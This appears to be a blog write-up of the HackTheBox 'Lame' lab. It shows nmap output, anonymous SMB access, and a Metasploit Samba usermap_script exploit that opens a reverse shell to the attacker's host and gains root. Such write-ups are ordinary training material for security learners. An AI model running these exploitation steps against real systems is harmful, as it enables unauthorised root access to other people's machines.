HackTheBox: LAME

This was such an easy machine, its almost not worth completing the write-up for it. But i decided in the end that i would, purely for completeness.

I scanned the machine with NMAP, and was presented with the following details.

# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.065s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-19T02:31:04-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   30.07 ms 10.10.14.1
2   31.77 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds

From here we can see FTP, SMB, DISTCC and SSH are all running. Anonymous access was allowed on FTP. But there are no files present. I next tried connecting to SMB:

root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445 
Enter WORKGROUP\root's password:                                          
Anonymous login successful                                                
Try "help" to get a list of possible commands.                            
smb: \> ls                                                                
  .                                   D        0  Fri Dec  6 16:56:00 2019
  ..                                 DR        0  Sun May 20 20:36:12 2012
  orbit-makis                        DR        0  Fri Dec  6 11:25:31 2019
  .ICE-unix                          DH        0  Fri Dec  6 11:03:09 2019
  .X11-unix                          DH        0  Fri Dec  6 11:03:34 2019
  gconfd-makis                       DR        0  Fri Dec  6 11:25:31 2019
  .X0-lock                           HR       11  Fri Dec  6 11:03:34 2019                        
  5120.jsvc_up                        R        0  Fri Dec  6 11:04:17 2019        
                                                                                                                    
                7282168 blocks of size 1024. 5678284 blocks available

You see see from the output we also have anonymous SMB access. However after some browsing around there are no useful files stored within SMB either.

One of the details detected in the NMAP scan was that Samba 3.0.20-Debian was being used. I did a google search for exploits involving this version of SAMBA. I found a Username Map Script exploit which allows command execution by specifying a username containing shell meta characters. This exploit in included in metasploit. So i started msfconsole and ran the exploit:

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3                                           
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RXu673TIo0yJNYIz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RXu673TIo0yJNYIz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000                                                                                       

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
root
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
[REDACTED]

From the output you can see the exploit ran successfully. Entering the whoami command showed that i was running as root. From here i was able to browse to /root and cat root.txt.

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *